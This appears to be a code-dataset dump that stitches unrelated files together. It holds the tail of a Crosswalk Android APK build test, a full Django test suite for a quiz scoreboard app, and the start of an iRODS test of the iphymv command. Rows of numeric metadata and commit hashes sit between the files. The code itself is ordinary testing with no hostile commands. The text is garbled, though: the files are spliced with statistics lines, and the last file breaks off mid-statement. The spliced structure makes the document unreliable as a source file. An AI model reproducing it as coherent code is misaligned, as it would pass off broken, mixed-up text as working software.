os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 1) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_arm64_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="arm64-v8a x86_64" ./' return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 1) self.assertEquals(arm_64Length, 1) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_noABIs(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="arm64-v8a x86_64" ./' return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) if __name__ == '__main__': unittest.main()
44.356401
132
0.551954
2,937
25,638
4.736466
0.068437
0.03738
0.032708
0.042053
0.916253
0.912803
0.911006
0.909352
0.909352
0.909352
0
0.049566
0.33505
25,638
577
133
44.433276
0.766424
0.058039
0
0.939623
0
0
0.131752
0.043904
0
0
0
0
0.177358
1
0.026415
false
0
0.007547
0
0.035849
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
96ec8a5a907cb52660917856c08f9e81bb3c0ebc
28,082
py
Python
board/test_models.py
amalolan/scoreboard
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
[ "MIT" ]
null
null
null
board/test_models.py
amalolan/scoreboard
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
[ "MIT" ]
null
null
null
board/test_models.py
amalolan/scoreboard
5fe6bdc19a069c9a13f2a48f5cbfbb62cbfc9fd2
[ "MIT" ]
null
null
null
from django.test import TestCase from .models import * from copy import deepcopy # TODO: Test with total_rounds > 9 and total_teams > 9 class ScoreboardTestCase(TestCase): def setUp(self): scoreboard = Scoreboard.objects.create( num_teams=5, teams=['Coimbatore', 'Cuddalore', 'Bangalore', 'OMR', 'Gerukambakkam'], num_rounds=4) scoreboard.new_board() scoreboard.save() self.pk = scoreboard.pk scoreboard.sent() def get_scoreboard(self): return Scoreboard.objects.get(pk=self.pk) def test_set_theme(self): scoreboard = self.get_scoreboard() scoreboard.set_theme('default') self.assertEqual(scoreboard.theme, 'default') scoreboard.set_theme('light-blue') self.assertEqual(scoreboard.theme, 'light-blue') scoreboard.set_theme('big-bold') self.assertEqual(scoreboard.theme, 'light-blue big-bold') scoreboard.set_theme('light-brown') self.assertEqual(scoreboard.theme, 'light-brown big-bold') scoreboard.set_theme('big-bold') self.assertEqual(scoreboard.theme, 'light-brown') scoreboard.set_theme('big-bold') self.assertEqual(scoreboard.theme, 'light-brown big-bold') scoreboard.set_theme('default') self.assertEqual(scoreboard.theme, 'default big-bold') scoreboard.save() self.assertTrue(scoreboard.is_changed()) def test_fix_overflow(self): scoreboard = self.get_scoreboard() scoreboard.fix_overflow('team3') self.assertEqual(scoreboard.action_set.all().count(), 1) self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 0) self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1) scoreboard.fix_overflow('team1') self.assertEqual(scoreboard.action_set.all().count(), 2) self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 1) self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1) scoreboard.fix_overflow('team3') self.assertEqual(scoreboard.action_set.all().count(), 2) self.assertEqual(scoreboard.action_set.filter(cell="team1").count(), 1) self.assertEqual(scoreboard.action_set.filter(cell="team3").count(), 1) def test_add_question(self): scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) round_num = 2 question = ['Question 1', 1, 2, 3, 4, 5] board[round_num].append(question) scoreboard.add_question(round_num, question[1:]) self.assertEqual(board, scoreboard.board) board = deepcopy(scoreboard.board) round_num = 2 question = ['Question 2', 1, 2, 3, 4, 5] board[round_num].append(question) scoreboard.add_question(round_num, [str(i) for i in question[1:]]) self.assertEqual(board, scoreboard.board) round_num = 183 with self.assertRaises(AssertionError): scoreboard.add_question(round_num, question) round_num = 0 question = [1, 2, 3, 4, 5, 6, 7, 8] with self.assertRaises(AssertionError): scoreboard.add_question(round_num, question) round_num = 3 question = [1, 2] with self.assertRaises(AssertionError): scoreboard.add_question(round_num, question) question = [] with self.assertRaises(AssertionError): scoreboard.add_question(round_num, question) def test_get_sum(self): scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) round_num = 2 question = ['Question 1', 1, 10, 0, 1, 0] board[round_num].append(question) board[round_num][0][1:] = question[1:] scoreboard.add_question(round_num, question[1:]) self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) board = deepcopy(scoreboard.board) question = ['Question 2', 0, 1, 2, 0, 1] board[round_num].append(question) board[round_num][0][1:] = [1, 11, 2, 1, 1] scoreboard.add_question(round_num, question[1:]) self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) board = deepcopy(scoreboard.board) round_num = 3 question = ['Question 1', 0, 1, 2, 0, 1] board[round_num].append(question) board[round_num][0][1:] = question[1:] scoreboard.add_question(round_num, question[1:]) self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) board = deepcopy(scoreboard.board) round_num = 0 board[round_num][0][1:] = [1, 12, 4, 1, 2] self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) board = deepcopy(scoreboard.board) round_num = -1 with self.assertRaises(AssertionError): self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) board = deepcopy(scoreboard.board) round_num = 3114 with self.assertRaises(AssertionError): self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) with self.assertRaises(AssertionError): self.assertEqual(scoreboard.get_sum(round_num), board[round_num][0]) def test_get_winner(self): scoreboard = self.get_scoreboard() scoreboard.add_question(1, [1, 2, 3, 4, 5]) self.assertEqual(scoreboard.get_winner(), 'team5') scoreboard = self.get_scoreboard() scoreboard.add_question(2, [1, 2, 3, 4, 1]) self.assertEqual(scoreboard.get_winner(), 'team4') scoreboard.new_board() scoreboard = self.get_scoreboard() scoreboard.add_question(1, [1, 2, 5, 4, 5]) with self.assertRaises(AssertionError): scoreboard.get_winner() scoreboard.new_board() scoreboard = self.get_scoreboard() with self.assertRaises(AssertionError): scoreboard.get_winner() def test_gain_loss_animation(self): team = 'team3' points = 15 scoreboard = self.get_scoreboard() scoreboard.gain_loss_animation(team, points) self.assertEqual(scoreboard.action_set.all().count(), 1) self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___points=points).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 1) team = 'team3' points = -15 scoreboard = self.get_scoreboard() scoreboard.gain_loss_animation(team, points) self.assertEqual(scoreboard.action_set.all().count(), 2) self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 2) self.assertEqual(scoreboard.action_set.filter( GainLossAction___points=points).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 1) team = 'team1' points = 29 scoreboard = self.get_scoreboard() scoreboard.gain_loss_animation(team, points) self.assertEqual(scoreboard.action_set.all().count(), 3) self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___points=points).count(), 1) scoreboard.fix_overflow('team3') self.assertEqual(scoreboard.action_set.all().count(), 4) self.assertEqual(scoreboard.action_set.filter(cell=team).count(), 1) team = 'team3' points = 0 scoreboard = self.get_scoreboard() with self.assertRaises(AssertionError): scoreboard.gain_loss_animation(team, points) def test_change_points(self): coords = [[1, 0, 1], [3, 0, 2], [2, 0, 2], [4, 0, 3]] points = [10, 15, 15, -15] scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[1][0][1] = 10 board[3][0][2] = 15 board[2][0][2] = 15 board[4][0][3] = -15 board[0][0][1] = 10 board[0][0][2] = 30 board[0][0][3] = -15 scoreboard.change_points(coords, points) self.assertEqual(scoreboard.board, board) coords = [[1, 0, 1]] points = [10] scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[1][0][1] = 10 board[0][0][1] = 10 scoreboard.change_points(coords, points) self.assertEqual(scoreboard.board, board) coords = [[1, 0, 1]] points = [0] scoreboard.change_points(coords, points) self.assertEqual(scoreboard.board, board) def test_points_change(self): cell = '1,0,3' coords = [int(i) for i in cell.split(',')] points = 15 pc_animation = False gl_animation = False scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[coords[0]][0][coords[2]] += points board[0][0][coords[2]] += points scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(scoreboard.action_set.count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___points=points).count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='null').count(), 0) cell = '2,0,2' coords = [int(i) for i in cell.split(',')] points = -15 pc_animation = True gl_animation = False scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[coords[0]][0][coords[2]] += points board[0][0][coords[2]] += points scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(scoreboard.action_set.count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___points=points).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='null').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=False).count(), 1) # If pc_animation and gl_animation are true, check if GLAction object is # created and if PCAction object has animate_type set to gain/loss. cell = '3,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = True gl_animation = True scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[coords[0]][0][coords[2]] += points board[0][0][coords[2]] += points scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(scoreboard.action_set.count(), 3) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___points=points).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='null').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=False).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=True).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 2) self.assertEqual(scoreboard.action_set.filter(cell='team5').count(), 1) # If pc_animation is False, but gl_animation is true, check if GLAction # object is still created. cell = '4,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = False gl_animation = True scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[coords[0]][0][coords[2]] += points board[0][0][coords[2]] += points scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(scoreboard.action_set.count(), 4) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___points=points).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='null').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=False).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=True).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 3) cell = '4,0,5' coords = [int(i) for i in cell.split(',')] points = -20 pc_animation = False gl_animation = True scoreboard = self.get_scoreboard() board = deepcopy(scoreboard.board) board[coords[0]][0][coords[2]] += points board[0][0][coords[2]] += points scoreboard.points_change(cell, points, pc_animation, gl_animation) scoreboard.save() scoreboard.fix_overflow('team5') self.assertEqual(scoreboard.action_set.count(), 6) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___points=points).count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='null').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=False).count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___gl_animation=True).count(), 1) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 2) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 3) def test_question(self): rn = 2 scores = [1, 2, 1, 1, 1] pc = False gl = False scoreboard = self.get_scoreboard() rs = str(rn) + ",0" scoreboard.question(rn, scores, pc, gl) self.assertEqual(scoreboard.action_set.count(), 1) self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='null').count(), 1) self.assertEqual(scoreboard.action_set.filter( QuestionAction___scores=scores).count(), 1) scoreboard.save() rn = 2 scores = [1, 2, 0, 0, 1] pc = True gl = False scoreboard = self.get_scoreboard() rs = str(rn) + ",0" scoreboard.question(rn, scores, pc, gl) self.assertEqual(scoreboard.action_set.count(), 8) self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 2) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='null').count(), 1) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 7) self.assertEqual(scoreboard.action_set.filter(cell='2,0,5').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='2,0,1').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='2,0,2').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,5').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,1').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,2').count(), 1) self.assertEqual(scoreboard.action_set.filter( name='points_change').count(), 6) scoreboard.save() rn = 4 scores = [1, -39, 0, -2, 15] pc = True gl = True scoreboard = self.get_scoreboard() rs = str(rn) + ",0" scoreboard.question(rn, scores, pc, gl) self.assertEqual(scoreboard.action_set.count(), 21) self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='null').count(), 1) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='gain').count(), 2) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 12) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 4) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 6) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 14) self.assertEqual(scoreboard.action_set.filter( cell="team1").count(), 1) self.assertEqual(scoreboard.action_set.filter( cell="team5").count(), 1) self.assertEqual(scoreboard.action_set.filter( cell="team2").count(), 1) self.assertEqual(scoreboard.action_set.filter( cell="team4").count(), 1) scoreboard.save() rn = 1 scores = [-1000, 0, 0, 0, 15] pc = False gl = True scoreboard = self.get_scoreboard() rs = str(rn) + ",0" scoreboard.question(rn, scores, pc, gl) self.assertEqual(scoreboard.action_set.filter( GainLossAction___points=0).count(), 0) self.assertEqual(scoreboard.action_set.count(), 24) self.assertEqual(scoreboard.action_set.filter(cell=rs).count(), 1) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='null').count(), 2) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='gain').count(), 2) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 12) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='loss').count(), 4) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='loss').count(), 7) self.assertEqual(scoreboard.action_set.filter( GainLossAction___animation_type='gain').count(), 15) self.assertEqual(scoreboard.action_set.filter( cell="team1").count(), 2) self.assertEqual(scoreboard.action_set.filter( cell="team5").count(), 2) self.assertEqual(scoreboard.action_set.filter( cell="team2").count(), 1) self.assertEqual(scoreboard.action_set.filter( cell="team4").count(), 1) scoreboard.save() self.setUp() rn = 2 scores = [1, 2, 3, 4, 5] pc = True gl = False scoreboard = self.get_scoreboard() rs = str(rn) + ",0" scoreboard.question(rn, scores, pc, gl) self.assertEqual(scoreboard.action_set.count(), 11) self.assertEqual(scoreboard.action_set.filter( QuestionAction___animation_type='null').count(), 0) self.assertEqual(scoreboard.action_set.filter( PointsChangeAction___animation_type='gain').count(), 11) self.assertEqual(scoreboard.action_set.filter(cell='2,0,5').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='2,0,1').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='2,0,2').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,5').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,1').count(), 1) self.assertEqual(scoreboard.action_set.filter(cell='0,0,2').count(), 1) self.assertEqual(scoreboard.action_set.filter( name='points_change').count(), 10) def test_save_points_changes(self): scoreboard = self.get_scoreboard() cell = '1,0,3' coords = [int(i) for i in cell.split(',')] points = 15 pc_animation = False gl_animation = False scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(len(scoreboard.history), 1) self.assertEqual(scoreboard.history[-1].get('points'), points) scoreboard.save_points_changes() self.assertEqual(len(scoreboard.history), 1) self.assertIsNone(scoreboard.history[-1].get('points')) self.assertEqual(scoreboard.history[-1].get('scores'), [0, 0, 15, 0, 0]) self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0]) self.assertEqual(scoreboard.history[-1].get('question_num'), 1) scoreboard.save() scoreboard = self.get_scoreboard() cell = '1,0,2' coords = [int(i) for i in cell.split(',')] points = -30 pc_animation = True gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '1,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(len(scoreboard.history), 3) self.assertEqual(scoreboard.history[-1].get('points'), points) self.assertEqual(scoreboard.history[-2].get('points'), -30) scoreboard.save_points_changes() self.assertEqual(len(scoreboard.history), 2) self.assertIsNone(scoreboard.history[-1].get('points')) self.assertEqual(scoreboard.history[-1].get('scores'), [0, -30, 0, 0, 1]) self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0]) self.assertEqual(scoreboard.history[-1].get('question_num'), 2) scoreboard.save() scoreboard = self.get_scoreboard() cell = '2,0,2' coords = [int(i) for i in cell.split(',')] points = -30 pc_animation = True gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '2,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '2,0,1' coords = [int(i) for i in cell.split(',')] points = 12 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(len(scoreboard.history), 5) self.assertEqual(scoreboard.history[-1].get('points'), points) self.assertEqual(scoreboard.history[-2].get('points'), 1) scoreboard.save_points_changes() self.assertEqual(len(scoreboard.history), 3) self.assertIsNone(scoreboard.history[-1].get('points')) self.assertEqual(scoreboard.history[-1].get('scores'), [12, -30, 0, 0, 1]) self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0]) self.assertEqual(scoreboard.history[-1].get('question_num'), 1) scoreboard.save() scoreboard = self.get_scoreboard() cell = '3,0,2' coords = [int(i) for i in cell.split(',')] points = -30 pc_animation = True gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '2,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '2,0,1' coords = [int(i) for i in cell.split(',')] points = 12 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(len(scoreboard.history), 6) self.assertEqual(scoreboard.history[-1].get('points'), points) self.assertEqual(scoreboard.history[-2].get('points'), 1) scoreboard.save_points_changes() self.assertEqual(len(scoreboard.history), 5) self.assertIsNone(scoreboard.history[-1].get('points')) self.assertEqual(scoreboard.history[-1].get('scores'), [12, 0, 0, 0, 1]) self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0]) self.assertEqual(scoreboard.history[-1].get('question_num'), 2) self.assertEqual(scoreboard.history[-2].get('points'), -30) self.assertEqual(scoreboard.history[-2].get('round_num'), 3) scoreboard.save() scoreboard = self.get_scoreboard() cell = '3,0,2' coords = [int(i) for i in cell.split(',')] points = -30 pc_animation = True gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '3,0,5' coords = [int(i) for i in cell.split(',')] points = 1 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) cell = '3,0,1' coords = [int(i) for i in cell.split(',')] points = 12 pc_animation = False gl_animation = True scoreboard.points_change(cell, points, pc_animation, gl_animation) self.assertEqual(len(scoreboard.history), 8) self.assertEqual(scoreboard.history[-1].get('points'), points) self.assertEqual(scoreboard.history[-2].get('points'), 1) scoreboard.save_points_changes() self.assertEqual(len(scoreboard.history), 6) self.assertIsNone(scoreboard.history[-1].get('points')) self.assertEqual(scoreboard.history[-1].get('scores'), [12, -30, 0, 0, 1]) self.assertEqual(scoreboard.history[-1].get('round_num'), coords[0]) self.assertEqual(scoreboard.history[-1].get('question_num'), 1) self.assertEqual(scoreboard.history[-3].get('points'), -30) self.assertEqual(scoreboard.history[-3].get('round_num'), 3) scoreboard.save()
44.015674
82
0.625988
3,222
28,082
5.274364
0.041279
0.14917
0.230964
0.200659
0.933624
0.920737
0.900847
0.876721
0.868601
0.835236
0
0.029243
0.243786
28,082
638
83
44.015674
0.771002
0.010113
0
0.792553
0
0
0.035585
0
0
0
0
0.001567
0.328014
1
0.021277
false
0
0.005319
0.001773
0.030142
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
8c047e6dea2646398154f76b598a81a7a4503096
4,978
py
Python
tests/pydevtest/test_iphymv.py
iychoi/cyverse-irods
0070b8677a82e763f1d940ae6537b1c8839a628a
[ "BSD-3-Clause" ]
null
null
null
tests/pydevtest/test_iphymv.py
iychoi/cyverse-irods
0070b8677a82e763f1d940ae6537b1c8839a628a
[ "BSD-3-Clause" ]
7
2019-12-02T17:55:49.000Z
2019-12-02T17:55:59.000Z
tests/pydevtest/test_iphymv.py
benlazarine/cyverse-irods
2bf9cfae4c3a1062ffe2af92b1f086ddc5fce025
[ "BSD-3-Clause" ]
1
2019-12-02T05:40:13.000Z
2019-12-02T05:40:13.000Z
import os import re import sys if sys.version_info < (2, 7): import unittest2 as unittest else: import unittest import shutil import configuration from resource_suite import ResourceBase import lib import copy class Test_iPhymv(ResourceBase, unittest.TestCase): def setUp(self): super(Test_iPhymv, self).setUp() self.testing_tmp_dir = '/tmp/irods-test-iphymv' shutil.rmtree(self.testing_tmp_dir, ignore_errors=True) os.mkdir(self.testing_tmp_dir) def tearDown(self): shutil.rmtree(self.testing_tmp_dir) super(Test_iPhymv, self).tearDown() def test_iphymv_invalid_resource__2821(self): filepath = os.path.join(self.admin.local_session_dir, 'file') lib.make_file(filepath, 1) dest_path = self.admin.session_collection + '/file' self.admin.assert_icommand('iput ' + filepath) self.admin.assert_icommand('iphymv -S invalidResc -R demoResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_RESC_DOES_NOT_EXIST') self.admin.assert_icommand('iphymv -S demoResc -R invalidResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_RESC_DOES_NOT_EXIST') def test_iphymv_unable_to_unlink__2820(self): filepath = os.path.join(self.admin.local_session_dir, 'file') lib.make_file(filepath, 1) dest_path = self.admin.session_collection + '/file' self.admin.assert_icommand('ireg '+filepath+' '+dest_path) os.chmod(filepath, 0444) self.admin.assert_icommand('iphymv -S demoResc -R pydevtest_TestResc '+dest_path, 'STDERR_SINGLELINE', 'SYS_USER_NO_PERMISSION') os.chmod(filepath, 0666) self.admin.assert_icommand('iphymv -S demoResc -R pydevtest_TestResc '+dest_path) def test_iphymv_to_child_resource__2933(self): self.admin.assert_icommand("iadmin mkresc rrResc roundrobin", 'STDOUT_SINGLELINE', 'roundrobin') self.admin.assert_icommand("iadmin mkresc unix1Resc 'unixfilesystem' " + configuration.HOSTNAME_1 + ":" + lib.get_irods_top_level_dir() + "/unix1RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem') self.admin.assert_icommand("iadmin mkresc unix2Resc 'unixfilesystem' " + configuration.HOSTNAME_2 + ":" + lib.get_irods_top_level_dir() + "/unix2RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem') self.admin.assert_icommand("iadmin addchildtoresc rrResc unix1Resc") self.admin.assert_icommand("iadmin addchildtoresc rrResc unix2Resc") filepath = os.path.join(self.admin.local_session_dir, 'file') lib.make_file(filepath, 1) dest_path = self.admin.session_collection + '/file' self.admin.assert_icommand('iput -fR rrResc ' + filepath + ' ' + dest_path) self.admin.assert_icommand('ils -L ' + dest_path, 'STDOUT_SINGLELINE', 'rrResc') self.admin.assert_icommand('iphymv -S unix1Resc -R unix2Resc ' + dest_path) self.admin.assert_icommand('irm -f ' + dest_path) self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix2Resc") self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix1Resc") self.admin.assert_icommand("iadmin rmresc unix2Resc") self.admin.assert_icommand("iadmin rmresc unix1Resc") self.admin.assert_icommand("iadmin rmresc rrResc") def test_iphymv_to_resc_hier__2933(self): self.admin.assert_icommand("iadmin mkresc rrResc roundrobin", 'STDOUT_SINGLELINE', 'roundrobin') self.admin.assert_icommand("iadmin mkresc unix1Resc 'unixfilesystem' " + configuration.HOSTNAME_1 + ":" + lib.get_irods_top_level_dir() + "/unix1RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem') self.admin.assert_icommand("iadmin mkresc unix2Resc 'unixfilesystem' " + configuration.HOSTNAME_2 + ":" + lib.get_irods_top_level_dir() + "/unix2RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem') self.admin.assert_icommand("iadmin addchildtoresc rrResc unix1Resc") self.admin.assert_icommand("iadmin addchildtoresc rrResc unix2Resc") filepath = os.path.join(self.admin.local_session_dir, 'file') lib.make_file(filepath, 1) dest_path = self.admin.session_collection + '/file' self.admin.assert_icommand('iput -fR rrResc ' + filepath + ' ' + dest_path) self.admin.assert_icommand('ils -L ' + dest_path, 'STDOUT_SINGLELINE', 'rrResc') self.admin.assert_icommand('iphymv -S "rrResc;unix1Resc" -R "rrResc;unix2Resc" ' + dest_path) self.admin.assert_icommand('irm -f ' + dest_path) self.admin.assert_icommand("iadmin rmchildfromresc rrResc 